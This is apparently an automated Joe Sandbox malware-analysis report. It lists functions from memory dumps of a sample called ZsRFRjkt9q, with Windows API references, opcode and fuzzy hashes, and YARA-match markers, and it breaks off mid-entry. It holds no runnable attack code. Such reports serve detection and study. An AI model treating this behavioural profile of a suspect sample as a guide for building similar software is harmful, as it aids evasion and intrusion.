Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction ID: 8b7bc8fe1a5fa04043bd824518bc22570f1d1bea298f585b1bbc81c01d5ec82f
Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction Fuzzy Hash: 5512CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 00422957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 00422A0B

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: 8f2a899de28b9b8ac1dd69c8cddf2acff934126b4057793d23fbf70436a2ef8e
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: EB41E870700726BFDB288EA9E68056F77A6AF45350F54852FE845C7640DAF8DD818B48

Function 0041ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0041EDC7

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: e1e9453dff8cdd36c9b53572e70871791048215458511bd1f5cf1fdffc6e0534
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: B231FC78A00106DBC718DF1AE4809A9F7B6FF49340B6486A6E809CB355DB34EDC1CB85

Function 00479A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00479A80

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 1df3721e37ec9a61bec6498477f8f17de3e5c797bd80908afe73e9afb7f65ebb
Instruction ID: 123904f6986cbe28aed5baaaa90aadec874594827bf1280dce4f1c7dc905d36c
Opcode Fuzzy Hash: 1df3721e37ec9a61bec6498477f8f17de3e5c797bd80908afe73e9afb7f65ebb
Instruction Fuzzy Hash: D2416D705086118FDB24DF14C044B5ABBE1BF85308F1989ADE99A4B362C37AFC86CF56

Function 0042ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: a6c1fd6ee4218ab5df39322316b04da92d276417d86081aa00573c9f534d8558
Instruction ID: ff3dbfd8fb757ae33103e64630012ac25ad7e546c7d460c7a2a5456dac6fe457
Opcode Fuzzy Hash: a6c1fd6ee4218ab5df39322316b04da92d276417d86081aa00573c9f534d8558
Instruction Fuzzy Hash: E921A472B142718BD7117FA6FC017593A515F42339FA6064AE4305B1E2DBBC9C01CBAE

Function 004041A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00404214: FreeLibrary.KERNEL32(00000000,?), ref: 00404247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

Part of subcall function 00404291: FreeLibrary.KERNEL32(00000000), ref: 004042C4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction ID: 1f80cfd2d09e1638bed56b013e730591200b4cfe8bff1834d2c9f7d5b423193b
Opcode Fuzzy Hash: bdc7bc1839d97ab04ecd5fd31589a7babd8fc0f1fafcf12f2688e08ee6139e99
Instruction Fuzzy Hash: A011C871700206AADB10BB71DC06B9E77A99FC0748F10847EF656B61C1DB789A059B58

Function 00479B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00479B51

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fe7d91201e67a544e0f15ac9414c7b567abc80653f2edb112d968aaf2ecbbcc0
Instruction ID: a3e8d651301d5cdfce25b2048ede81e560c51bdd0112b26095fcab813be825f0
Opcode Fuzzy Hash: fe7d91201e67a544e0f15ac9414c7b567abc80653f2edb112d968aaf2ecbbcc0
Instruction Fuzzy Hash: CC2146705082018FDB24DF25C444B5ABBE1BF84308F14896EF59A4B362C779F886CF5A

Function 0042AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0042AFC0

Part of subcall function 00427BDA: __getptd_noexit.LIBCMT ref: 00427BDA

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction ID: 72f555c6501e1ce87cd012baef782597da69394b83e16657c689296a690b0a37
Opcode Fuzzy Hash: 11c00ffc3f7456b8b7639cd1d23e0bdfdcc4dcbab5d0a08258685fbd082b0570
Instruction Fuzzy Hash: B711B672B046308FD7127FA5B90175A7B609F42339F96424AE4705B1E2CBBC9D008BAE

Function 004039DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: e462a9ed68780897a26be5b7c37f438fac53c332684aae35b8fe6951bdcf7267
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 9D018671500109EECF04EF65C8918FEBF78AF20344F00806FB515A71E5EA349A49DF68

Function 00422AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00422AED

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction ID: 5589abf0bb1310eb904447484f268859338ac04dd37c0e0a6a4a15a0a52f55d4
Opcode Fuzzy Hash: 75817c05e41aff18e0b5dc307dc2a24adc95069273b999b4acbc6a7d50f9e70f
Instruction Fuzzy Hash: 3CF0C231700225BADF21AF76AD023DF3AA1BF40318F96442BB4149B191C7BC8A52DB59

Function 00404252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,004039FE,?,00000001), ref: 00404286

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction ID: 74f35774a27debaa66b6be3da2798f9a4b53b6784b46458f95cdd3b3f822c893
Opcode Fuzzy Hash: aa9df2f1f3d3afe1309460d4fe78f022ae08662da92f8d56ef81b65362027b2c
Instruction Fuzzy Hash: 65F0A0B0605301CFCB349F60D484816B7F0BF443653208ABFF2C692650C3399840DF44

Function 004040A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004040C6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction ID: 0290631fc8dec078d58f0ec9d0cf7d10399dccf95bf213d32d7819efeea1db69
Opcode Fuzzy Hash: 9d95857b7837f52a5ea900d0463dd10bf0ab9cd554c9ff5156831bebcfff610c
Instruction Fuzzy Hash: 9BE07D326001241BC711A254CC46FEE73ACDF8C6A4F050079F905E3244DA7499808794

Function 0044BCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0044BD16

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 6c86919d95f66fb5931691e788f64ba211e296de40cb72ec795bb132f844f128
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: 1BE092B1604B009BE7388A24D800BE373E0EB05309F00085DF29A83341EBA6B841865D

Function 009B4FC4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 009B4FD9

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 813d2c9d354753de6955f4eabcdd0c0c83900921156015974d594cf0970bb6a9
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 9EE0BF7494510EEFDB00DFA4D6496ED7BB4EF04311F1005A1FD05D7680DB309E549A62

Function 009B4FC8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 009B4FD9

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 382bba6fb22fc3211063268d112bb8283aabffe29ceb64381055efdccbf4e4f4
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: ACE0E67494510EDFDB00DFB4D6496ED7BB4EF04301F100161FD01D2280DA309D509A62

Non-executed Functions

Function 0046F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

NtdllDialogWndProc_W.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0046F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0046F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046F940
SendMessageW.USER32 ref: 0046F966
_wcsncpy.LIBCMT ref: 0046F9D2
GetKeyState.USER32(00000011), ref: 0046F9F3
GetKeyState.USER32(00000009), ref: 0046FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0046FA16
GetKeyState.USER32(00000010), ref: 0046FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0046FA4F
SendMessageW.USER32 ref: 0046FA72
SendMessageW.USER32(?,00001030,?,0046E059), ref: 0046FB6F
6F59CB00.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0046FB85
6F59C2F0.COMCTL32(00000000,000000F8,000000F0), ref: 0046FB96
SetCapture.USER32(?), ref: 0046FB9F
ClientToScreen.USER32(?,?), ref: 0046FC03
6F59C530.COMCTL32(00000000,?,?), ref: 0046FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0046FC29
ReleaseCapture.USER32 ref: 0046FC34
GetCursorPos.USER32(?), ref: 0046FC69
ScreenToClient.USER32(?,?), ref: 0046FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FCD8
SendMessageW.USER32 ref: 0046FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FD41
SendMessageW.USER32 ref: 0046FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0046FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0046FD8F
GetCursorPos.USER32(?), ref: 0046FDB0
ScreenToClient.USER32(?,?), ref: 0046FDBD
GetParent.USER32(?), ref: 0046FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0046FE3F
SendMessageW.USER32 ref: 0046FE6F
ClientToScreen.USER32(?,?), ref: 0046FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0046FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0046FF19
SendMessageW.USER32 ref: 0046FF3C
ClientToScreen.USER32(?,?), ref: 0046FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0046FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0047004B

Strings

@GUI_DRAGID, xrefs: 0046FBCC
F, xrefs: 0046FF42

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$C530DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 769010159-4164748364
Opcode ID: 513e673a684085903af3a68e9cc20ba3dff9b5133ba034c09a2775dd4a1645ce
Instruction ID: cc02e03bbf0bf54211185d3ef7d393deee0c208a90fc515681584bca93a84043
Opcode Fuzzy Hash: 513e673a684085903af3a68e9cc20ba3dff9b5133ba034c09a2775dd4a1645ce
Instruction Fuzzy Hash: 3832CA70604244EFDB10DF64D880FAABBA4FF49358F040A6AF695872A1E734DC49CB5A

Function 0046AACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0046B1CD

Strings

%d/%02d/%02d, xrefs: 0046AEFC

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: d72706a9410115efe04fcad9763c369cf006413e6ceaf8e74eeb315c7acb5c10
Instruction ID: 34171e6ab594a03bc3671029e554b35f8d6d1caf128c67eefd81c7f472873446
Opcode Fuzzy Hash: d72706a9410115efe04fcad9763c369cf006413e6ceaf8e74eeb315c7acb5c10
Instruction Fuzzy Hash: 5812BF71600218ABEB248F65CC49FAF7BB4FF45710F10412BF915EA2D1EB789942CB5A

Function 0041EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0041EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00473AEA
IsIconic.USER32(000000FF), ref: 00473AF3
ShowWindow.USER32(000000FF,00000009), ref: 00473B00
SetForegroundWindow.USER32(000000FF), ref: 00473B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00473B20
GetCurrentThreadId.KERNEL32 ref: 00473B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00473B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00473B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 00473B54
SetForegroundWindow.USER32(000000FF), ref: 00473B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B6C
keybd_event.USER32(00000012,00000000), ref: 00473B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B81
keybd_event.USER32(00000012,00000000), ref: 00473B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B8F
keybd_event.USER32(00000012,00000000), ref: 00473B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 00473B9E
keybd_event.USER32(00000012,00000000), ref: 00473BA3
SetForegroundWindow.USER32(000000FF), ref: 00473BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 00473BCD

Strings

Shell_TrayWnd, xrefs: 00473AE5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 9641c01d01e40d42ee8f5cf71437ba4774e896593e718536b9572676ccf2a4f5
